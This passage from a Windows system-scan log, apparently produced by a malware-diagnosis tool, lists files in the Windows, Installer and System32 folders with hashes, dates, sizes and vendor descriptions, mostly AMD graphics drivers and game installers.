[14/07/2009 03:20:10] - |D| - [70634509] - C:\Windows\servicing
[14/07/2009 04:45:50] - |D| - [42] - C:\Windows\Setup
[MD5.9ED71C411B66FC398368D1FE83370C54] - [12/02/2015 16:10:14] - |A| - (.-.) - [92304] - (0.0.0.0) - C:\Windows\setupact.log
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [12/02/2015 16:10:14] - |A| - (.-.) - [0] - (0.0.0.0) - C:\Windows\setuperr.log
[14/07/2009 15:35:30] - |D| - [101851] - C:\Windows\ShellNew
[07/11/2014 11:08:39] - |D| - [2707341381] - C:\Windows\SoftwareDistribution
[14/07/2009 03:20:10] - |D| - [70579144] - C:\Windows\Speech
[MD5.D01628AF9F7FB3F415B357D446FBE6D9] - [20/01/2017 21:34:09] - |A| - (.© Microsoft Corporation. - Print driver host for 32bit applications.) - [67072] - (6.1.7601.17514) - C:\Windows\splwow64.exe
[MD5.9060C3C745E7B2D8E1A81DD061021546] - [14/07/2009 05:28:38] - |A| - (.-.) - [48201] - (0.0.0.0) - C:\Windows\Starter.xml
[14/07/2009 03:20:10] - |D| - [0] - C:\Windows\system
[MD5.286A9EDB379DC3423A528B0864A0F111] - [14/07/2009 02:34:57] - |A| - (.-.) - [219] - (0.0.0.0) - C:\Windows\system.ini
[14/07/2009 03:20:10] - |D| - [4399883280] - C:\Windows\System32
[14/07/2009 03:20:14] - |D| - [1655954753] - C:\Windows\SysWOW64
[14/07/2009 03:20:14] - |D| - [15] - C:\Windows\TAPI
[14/07/2009 03:20:14] - |D| - [32502] - C:\Windows\Tasks
[09/04/2016 12:12:11] - |D| - [0] - C:\Windows\Temp
[14/07/2009 03:20:14] - |D| - [0] - C:\Windows\tracing
[MD5.0BEA3F79A36B1F67B2CE0F595524C77C] - [10/06/2009 21:41:17] - |A| - (.- Twain Source Manager (Image Acquisition Interface).) - [94784] - (1.7.0.0) - C:\Windows\twain.dll
[14/07/2009 05:32:38] - |D| - [6144] - C:\Windows\twain_32
[MD5.163A95975E1D8819E653AA3E961371CA] - [20/01/2017 21:33:19] - |A| - (.- Gestionnaire de sources Twain_32 (Image Acquisition Interface).) - [51200] - (1.7.1.3) - C:\Windows\twain_32.dll
[MD5.F36A271706EDD23C94956AFB56981184] - [13/07/2009 22:47:26] - |A| - (.- Twain_32.dll Client's 16-Bit Thunking Server.) - [49680] - (1.7.0.0) - C:\Windows\twunk_16.exe
[MD5.0BD6E68F3EA0DD62CD86283D86895381] - [14/07/2009 00:14:40] - |A| - (.- Twain.dll Client's 32-Bit Thunking Server.) - [31232] - (1.7.1.0) - C:\Windows\twunk_32.exe
[14/07/2009 03:20:14] - |D| - [12420] - C:\Windows\Vss
[14/07/2009 03:20:14] - |D| - [40681427] - C:\Windows\Web
[MD5.2465EBC8CD6E412CDC1AB9FEF40BCAE6] - [14/07/2009 02:34:57] - |A| - (.-.) - [478] - (0.0.0.0) - C:\Windows\win.ini
[MD5.5A5CFF37F1BD0F86B9BDAAD7A9445882] - [14/07/2009 04:54:24] - |RAH| - (.-.) - [749] - (0.0.0.0) - C:\Windows\WindowsShell.Manifest
[MD5.E1C76C5B91F330C05C32CBE9CF5A7A35] - [07/11/2014 11:08:39] - |A| - (.-.) - [1932366] - (0.0.0.0) - C:\Windows\WindowsUpdate.log
[MD5.1D420D66250BCAAAED05724FB34008CF] - [14/07/2009 00:12:29] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Relais Windows Winhlp32.) - [9728] - (6.1.7600.16385) - C:\Windows\winhlp32.exe
[14/07/2009 03:20:14] - |D| - [10563403631] - C:\Windows\winsxs
[MD5.DC17DD0189B0C36D863B4DD0A036C10F] - [10/06/2009 20:52:44] - |A| - (.-.) - [316640] - (0.0.0.0) - C:\Windows\WMSysPr9.prx
[MD5.F8ED3B4B209E2CB49028E36CF06CA851] - [13/07/2009 23:56:28] - |A| - (.© Microsoft Corporation. - Windows Write.) - [10240] - (6.1.7600.16385) - C:\Windows\write.exe
[MD5.CC7AA7B42CF418FC3D926913490048F8] - [09/04/2016 12:12:12] - |A| - (.-.) - [24064] - (5.0.0.0) - C:\Windows\zoek-delete.exe

---------- | C:\Windows\System32\GroupPolicy

[28/02/2017 21:41:36] - |D| - [0] - C:\Windows\System32\GroupPolicy\Adm
[MD5.A62CE44A33F1C05FC2D340EA0CA118A4] - [30/04/2017 16:13:57] - |A| - (.-.) - [268] - (0.0.0.0) - C:\Windows\System32\GroupPolicy\gpt.ini
[28/02/2017 21:41:36] - |D| - [4384] - C:\Windows\System32\GroupPolicy\Machine
[28/02/2017 21:41:36] - |D| - [0] - C:\Windows\System32\GroupPolicy\User

---------- | Systemroot\System


---------- | Systemroot\Installer (Microsoft Files Whitelisted)

[24/06/2016 15:33:37] - C:\Windows\Installer\10a8ab.msi : (Grand Theft Auto IV - Rockstar Games Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:16:42] - C:\Windows\Installer\12a3c52.msi : (AMD Wireless Display v3.0 Installer - Advanced Micro Devices Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[11/11/2014 08:49:56] - C:\Windows\Installer\12a3c58.msi : (Branding - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:13:38] - C:\Windows\Installer\12a3c5e.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:09:00] - C:\Windows\Installer\12a3c64.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:09:06] - C:\Windows\Installer\12a3c6a.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:09:14] - C:\Windows\Installer\12a3c70.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:09:20] - C:\Windows\Installer\12a3c76.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:09:28] - C:\Windows\Installer\12a3c7c.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:09:36] - C:\Windows\Installer\12a3c82.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:09:44] - C:\Windows\Installer\12a3c88.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:09:52] - C:\Windows\Installer\12a3c8e.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:10:00] - C:\Windows\Installer\12a3c94.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:10:06] - C:\Windows\Installer\12a3c9a.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:10:14] - C:\Windows\Installer\12a3ca0.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:10:20] - C:\Windows\Installer\12a3ca6.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:10:30] - C:\Windows\Installer\12a3cac.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:10:38] - C:\Windows\Installer\12a3cb2.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:10:44] - C:\Windows\Installer\12a3cb8.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:10:52] - C:\Windows\Installer\12a3cbe.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:11:00] - C:\Windows\Installer\12a3cc4.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:11:08] - C:\Windows\Installer\12a3cca.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:11:16] - C:\Windows\Installer\12a3cd0.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:11:22] - C:\Windows\Installer\12a3cd6.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:11:30] - C:\Windows\Installer\12a3cdc.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:11:36] - C:\Windows\Installer\12a3ce2.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:11:46] - C:\Windows\Installer\12a3ce8.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:17:28] - C:\Windows\Installer\12a3cf6.msi : (Drag & Drop Transcoding - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[28/11/2014 20:14:06] - C:\Windows\Installer\12a3cfc.msi : (AMD Accelerated Video Transcoding INstallation package - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[15/11/2014 06:52:22] - C:\Windows\Installer\137009.msi : (Google Update Helper - Google Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[13/08/2008 03:19:37] - C:\Windows\Installer\156f7cf.msi : (Mercenaries 2: World in Flames(tm) - Electronic Arts)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[12/02/2015 22:59:31] - C:\Windows\Installer\15a45a4.msi : (Java SE Runtime Environment 8.0 - Oracle Corporation)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[12/02/2015 22:59:29] - C:\Windows\Installer\15a45b5.msi : (Java Auto Updater - Oracle Corporation)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[24/06/2016 15:33:37] - C:\Windows\Installer\160c927.msi : (Grand Theft Auto IV - Rockstar Games Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[02/04/2015 22:48:33] - C:\Windows\Installer\18ff46b.msi : (System Requirements Lab - Husdawg, LLC)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:24:22] - C:\Windows\Installer\192755d.msi : (AMD Installer (64 bit) - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:08:56] - C:\Windows\Installer\1927563.msi : (AMD Wireless Display v3.0 Installer - Advanced Micro Devices Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:15:08] - C:\Windows\Installer\19276a4.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:15:24] - C:\Windows\Installer\19276aa.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:15:42] - C:\Windows\Installer\19276b0.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:16:00] - C:\Windows\Installer\19276b6.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:16:18] - C:\Windows\Installer\19276bc.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:16:38] - C:\Windows\Installer\19276c2.msi : (Catalyst Control Center next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:16:56] - C:\Windows\Installer\19276c8.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:17:14] - C:\Windows\Installer\19276ce.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:17:32] - C:\Windows\Installer\19276d4.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:17:50] - C:\Windows\Installer\19276da.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:18:06] - C:\Windows\Installer\19276e0.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:18:24] - C:\Windows\Installer\19276e6.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:18:42] - C:\Windows\Installer\19276ec.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:19:00] - C:\Windows\Installer\19276f2.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:19:18] - C:\Windows\Installer\19276f8.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:19:36] - C:\Windows\Installer\19276fe.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:19:56] - C:\Windows\Installer\1927704.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:20:16] - C:\Windows\Installer\192770a.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:20:32] - C:\Windows\Installer\1927710.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:20:50] - C:\Windows\Installer\1927716.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:21:08] - C:\Windows\Installer\192771c.msi : (Catalyst Control Center Next - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:23:12] - C:\Windows\Installer\1927722.msi : (AMD Settings - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/02/2016 23:14:46] - C:\Windows\Installer\1927728.msi : (AMD Settings - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[18/11/2015 23:36:54] - C:\Windows\Installer\192772e.msi : (Branding - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[02/01/2009 19:35:56] - C:\Windows\Installer\19ec990.msi : (Keyboard Layout Creator 1.4 - Denis)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[12/12/2016 20:26:43] - C:\Windows\Installer\1a1c8d5.msi : (Subversion Client - Stefan Kueng)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[17/06/2016 02:11:17] - C:\Windows\Installer\2190a9c.msi : (Adobe ARM Installer - Adobe Systems Incorporated)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[24/03/2009 09:35:22] - C:\Windows\Installer\21d4e3f.msi : (Blank Project Template - Eidos plc)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[29/08/2006 22:36:09] - C:\Windows\Installer\268369e.msi : (Scarface: The World is Yours - Radical Entertainment)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[17/02/2017 21:15:08] - C:\Windows\Installer\2b430e4.msi : (Install/UnInstall PhysX Driver + Engines: 2.7.1/3/4/5/6; 2.8.0/1/3 - NVIDIA Corporation)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[17/03/2015 08:41:29] - C:\Windows\Installer\4debb7.msi : ( - Adobe Systems Incorporated)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[25/01/2017 17:43:26] - C:\Windows\Installer\4f9498.msi : (Skype - Skype Technologies S.A.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[05/06/2015 15:43:37] - C:\Windows\Installer\5b7424.msi : (System Requirements Lab Detection - Husdawg, LLC)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[04/03/2015 15:06:47] - C:\Windows\Installer\6fbb9e.msi : (League of Legends - Riot Games)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[21/10/2014 13:16:32] - C:\Windows\Installer\72a4d.msi : (Google Chrome Installer - Google, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[07/11/2014 11:41:33] - C:\Windows\Installer\72a64.msi : (RealNetworks Upgrade 1.1.0 Component Installer - RealNetworks, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/04/2014 00:02:12] - C:\Windows\Installer\8378cd.msi : (The Witcher 2 Assassins of Kings - CD Projekt RED)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[27/01/2009 12:48:07] - C:\Windows\Installer\b777b5.msi : (ProductName from default.wxl - Electronic Arts)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[27/04/2017 19:11:57] - C:\Windows\Installer\f7037.msi : (Google Update Helper - Google Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[08/02/2010 11:44:48] - C:\Windows\Installer\fa9dc4.msi : (Steam - Valve)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]

---------- | %System%\*.in*

[14/07/2009 04:57:09] - [73] - C:\Windows\System32\desktop.ini
[13/07/2009 23:01:52] - [71951] - C:\Windows\System32\ieuinit.inf
[14/07/2009 05:13:15] - [1676014] - C:\Windows\System32\PerfStringBackup.INI
[10/06/2009 21:01:25] - [60124] - C:\Windows\System32\tcpmon.ini
[13/07/2009 22:38:23] - [71951] - C:\Windows\Syswow64\ieuinit.inf
[14/07/2009 04:55:01] - [535] - C:\Windows\Syswow64\mapisvc.inf
[30/12/2014 16:10:48] - [1649466] - C:\Windows\Syswow64\PerfStringBackup.INI

---------- | Listing no Microsoft signed files (Not necessary Malwares) | system32 | Syswow64 | General scan

[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:08] - [0 Ko] - C:\Windows\AppPatch\Custom\Custom64
[MD5.D9FDE19432E8B011DB8574C6CF5443AA] - |A| - [21/01/2017 13:19:22] - (.-.) - [122.35 Ko] - (0.0.0.0) - C:\Windows\AppPatch\AppPatch64\sysmain.sdb
[MD5.00000000000000000000000000000000] - |D| - [13/07/2017 21:04:12] - [0 Ko] - C:\Windows\Temp\DigitalWave.ApplicationUpdater_files
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:06] - [0 Ko] - C:\Windows\System32\040C
[MD5.EE9D7CC0AB7FF6BFC29E0249343DE60B] - |AH| - [14/07/2009 04:45:49] - (.-.) - [24.83 Ko] - (0.0.0.0) - C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[MD5.EE9D7CC0AB7FF6BFC29E0249343DE60B] - |AH| - [14/07/2009 04:45:49] - (.-.) - [24.83 Ko] - (0.0.0.0) - C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [4986 Ko] - C:\Windows\System32\AdvancedInstallers
[MD5.842934B146C1AA00D3256157264C8C6E] - |A| - [15/10/2015 20:59:08] - (.-.) - [171.53 Ko] - (0.0.0.0) - C:\Windows\System32\amde31a.dat
[MD5.7D33A83E62357096EFAE56F46EB7FF41] - |A| - [16/10/2015 18:19:12] - (.-.) - [162.66 Ko] - (0.0.0.0) - C:\Windows\System32\amde34a.dat
[MD5.965183F51535BB7AFDEB4CD9D4D58859] - |A| - [26/02/2016 20:04:04] - (.-.) - [200 Ko] - (0.0.0.0) - C:\Windows\System32\amdgfxinfo64.dll
[MD5.03D133708608619190C15D2DCDA1EF3C] - |A| - [01/02/2016 07:19:24] - (.-.) - [833.47 Ko] - (0.0.0.0) - C:\Windows\System32\amdicdxx.dat
[MD5.2C87EFB9C774787FA799BEF8A2427855] - |A| - [20/10/2015 16:14:12] - (.-.) - [6.95 Ko] - (0.0.0.0) - C:\Windows\System32\AMDKernelEvents.man
[MD5.4879D4002D034F68AA2C38933B4478E2] - |A| - [26/02/2016 20:23:28] - (.Advanced Micro Devices, Inc. Copyright (C) 2015 - LiquidVR SDK 1.0.) - [677 Ko] - (1.0.4.2) - C:\Windows\System32\amdlvr64.dll
[MD5.8A537FBD07965FC3219FE4B27209D60A] - |A| - [26/02/2016 20:22:50] - (.Copyright (C) 2013 AMD Inc. - Mantle driver, support for SI family and above.) - [6488.5 Ko] - (9.1.10.99) - C:\Windows\System32\amdmantle64.dll
[MD5.B6A48E2DDF6E7EE4939FC5ACCAB39C66] - |A| - [26/02/2016 20:08:34] - (.Copyright (c) 2013 Advanced Micro Devices, Inc. - Radeon MMOCL Universal Driver.) - [49.5 Ko] - (1.6.0.0) - C:\Windows\System32\amdmmcl6.dll
[MD5.A44464B4CC26B1905D394F24909262D4] - |A| - [26/02/2016 20:44:26] - (.Copyright (C) 2011 Advanced Micro Devices Inc. - AMD COMPILER OpenCL 1.1 Compiler.) - [26949.5 Ko] - (0.8.0.0) - C:\Windows\System32\amdocl12cl64.dll
[MD5.57FD8B01E9DEB81AEE09FE0D25D083DB] - |A| - [26/02/2016 20:48:14] - (.Copyright (C) 2011 Advanced Micro Devices Inc. - AMD Accelerated Parallel Processing OpenCL 2.0 Runtime.) - [48816.5 Ko] - (10.0.1912.5) - C:\Windows\System32\amdocl64.dll
[MD5.ECC9D68F5BEF5CD67BE2D2F758661980] - |A| - [07/11/2014 11:26:40] - (.-.) - [1159.51 Ko] - (0.0.0.0) - C:\Windows\System32\amdocl_as64.exe
[MD5.DD3E0FE46F9AB3F9A339F4DD3B2B2E4C] - |A| - [07/11/2014 11:26:41] - (.-.) - [1037.01 Ko] - (0.0.0.0) - C:\Windows\System32\amdocl_ld64.exe
[MD5.55FB99D275E04119AA4B3A84C5653A90] - |A| - [26/02/2016 21:00:48] - (.Copyright (c) 2009 Advanced Micro Devices, Inc. - Radeon PCOM Universal Driver.) - [76.59 Ko] - (8.14.10.23) - C:\Windows\System32\amdpcom64.dll
[MD5.00000000000000000000000000000000] - |D| - [24/05/2016 22:48:33] - [0 Ko] - C:\Windows\System32\appmgmt
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:10] - [201.5 Ko] - C:\Windows\System32\ar-SA
[MD5.6FAE7D3E563EB31ECFED6E9D5329AA99] - |A| - [07/11/2014 11:59:57] - (.-.) - [288.62 Ko] - (0.0.0.0) - C:\Windows\System32\aswBoot.exe
[MD5.83B9F85D21A49C666609EAD5E5A59928] - |A| - [26/02/2016 19:58:44] - (.Copyright (C) 2008-2015 Advanced Micro Devices, Inc. - ADL.) - [1243 Ko] - (7.16.10.1301) - C:\Windows\System32\atiadlxx.dll
[MD5.0E73887903642A98928DA4749B9E22FD] - |A| - [26/02/2016 20:11:18] - (.-.) - [670.13 Ko] - (0.0.0.0) - C:\Windows\System32\atiapfxx.blb
[MD5.7A77211E977B5CDD5CC927D5DA899E3C] - |A| - [26/02/2016 20:11:06] - (.Copyright (C) 2009 Advanced Micro Devices, Inc. - atiapfxx Application.) - [358.5 Ko] - (6.14.10.1001) - C:\Windows\System32\atiapfxx.exe
[MD5.749584902AE80A53EFDA4F8FA03E1713] - |A| - [07/11/2014 11:27:54] - (.Copyright (C) 2008 Advanced Micro Devices, Inc. - ATIBRTMON.) - [116 Ko] - (2.0.0.0) - C:\Windows\System32\atibtmon.exe
[MD5.D4E37A558AB973B40479C4B881A2D3C3] - |A| - [26/02/2016 20:10:52] - (.Copyright (C) 2008 Advanced Micro Devices Inc. - ATI CAL compiler runtime.) - [54.5 Ko] - (6.14.10.1848) - C:\Windows\System32\aticalcl64.dll
[MD5.D434634CF067B82E154EA265A5BBDA18] - |A| - [26/02/2016 20:10:36] - (.Copyright (C) 2008 Advanced Micro Devices Inc. - ATI CAL DD.) - [15343.5 Ko] - (6.14.10.1848) - C:\Windows\System32\aticaldd64.dll
[MD5.72EE0B56C3519ECCC60A5ECBF694FEF5] - |A| - [26/02/2016 20:11:00] - (.Copyright (C) 2008 Advanced Micro Devices Inc. - ATI CAL runtime.) - [61 Ko] - (6.14.10.1848) - C:\Windows\System32\aticalrt64.dll
[MD5.2944CF0814572AE9C2FB351E1EC96BA6] - |A| - [07/11/2014 11:27:06] - (.Copyright (C) 1998-2012 AMD Inc. - aticfx64.dll.) - [1470.7 Ko] - (8.17.10.1433) - C:\Windows\System32\aticfx64.dll
[MD5.C13BB4D340E15EB64CC78D0ED6A9C867] - |A| - [26/02/2016 20:04:26] - (.2002-2012 - Graphics DEM.) - [432 Ko] - (4.5.5900.27133) - C:\Windows\System32\atidemgy.dll
[MD5.C205107BC7584825C4E9924AAB39B9C5] - |A| - [07/11/2014 11:27:14] - (.Copyright (C) 1998-2011 AMD Inc. - atidxx64.dll.) - [13093.95 Ko] - (8.17.10.648) - C:\Windows\System32\atidxx64.dll
[MD5.80DD39F5936614CAE40116ACCEBAB5A8] - |A| - [26/02/2016 20:04:10] - (.-.) - [158.5 Ko] - (0.0.0.0) - C:\Windows\System32\atieah64.exe
[MD5.2015FF8029B9DB09211B106960791253] - |A| - [26/02/2016 20:03:54] - (.Copyright © 2008-2009 AMD - AMD External Events Client Module.) - [549.5 Ko] - (6.14.11.1209) - C:\Windows\System32\atieclxx.exe
[MD5.D7A72B9BA6AB996DADB37BFCB0363D63] - |A| - [26/02/2016 20:03:42] - (.Copyright © 2008-2009 AMD - AMD External Events Service Module.) - [243.5 Ko] - (6.14.11.1209) - C:\Windows\System32\atiesrxx.exe
[MD5.9AFA33FCEA80F44B266035F20626BE4C] - |A| - [26/02/2016 19:58:30] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atiglpxx.dll.) - [74 Ko] - (8.14.1.6489) - C:\Windows\System32\atig6pxx.dll
[MD5.98C9DD095478EBF82E5B0FC8542F8ADC] - |A| - [26/02/2016 19:58:24] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atigktxx.dll.) - [154 Ko] - (8.14.1.6489) - C:\Windows\System32\atig6txx.dll
[MD5.34D3499A909F0BB0199E1838F2DD2363] - |A| - [26/02/2016 19:58:28] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atiglpxx.dll.) - [68.5 Ko] - (8.14.1.6489) - C:\Windows\System32\atiglpxx.dll
[MD5.079EFFD5BECB418FE6596229B28D7324] - |A| - [06/11/2014 10:53:26] - (.-.) - [720.13 Ko] - (0.0.0.0) - C:\Windows\System32\atiicdxx.dat
[MD5.55FB99D275E04119AA4B3A84C5653A90] - |A| - [26/02/2016 21:00:48] - (.Copyright (c) 2009 Advanced Micro Devices, Inc. - Radeon PCOM Universal Driver.) - [76.59 Ko] - (8.14.10.23) - C:\Windows\System32\atimpc64.dll
[MD5.6DE203724E7B5E94722E5E9CE99B8417] - |A| - [26/02/2016 20:04:00] - (.Copyright ? 2009 AMD - Multi-language DPPE DLL.) - [76.5 Ko] - (6.14.10.1002) - C:\Windows\System32\atimuixx.dll
[MD5.4560EBD7666753FB0B3347088DD316B5] - |A| - [26/02/2016 20:14:54] - (.Copyright (C) 1998-2011 Advanced Micro Devices, Inc. - AMD OpenGL driver.) - [30643.5 Ko] - (6.14.10.13417) - C:\Windows\System32\atio6axx.dll
[MD5.A6BAAA6608A9B00220E9D5C023FC53D1] - |A| - [07/11/2014 11:27:54] - (.Copyright (C) 2008 - ATIODCLI Application.) - [50 Ko] - (1.0.0.1) - C:\Windows\System32\ATIODCLI.exe
[MD5.463FFBD3350E3EB57F7D5746EBD233CA] - |A| - [07/11/2014 11:27:54] - (.Copyright (C) 2008 - ATIODE Application.) - [325 Ko] - (1.0.0.1) - C:\Windows\System32\ATIODE.exe
[MD5.64A0869F18560CD529120ADE00155C3E] - |A| - [07/11/2014 11:26:56] - (.-.) - [3.83 Ko] - (0.0.0.0) - C:\Windows\System32\atipblag.dat
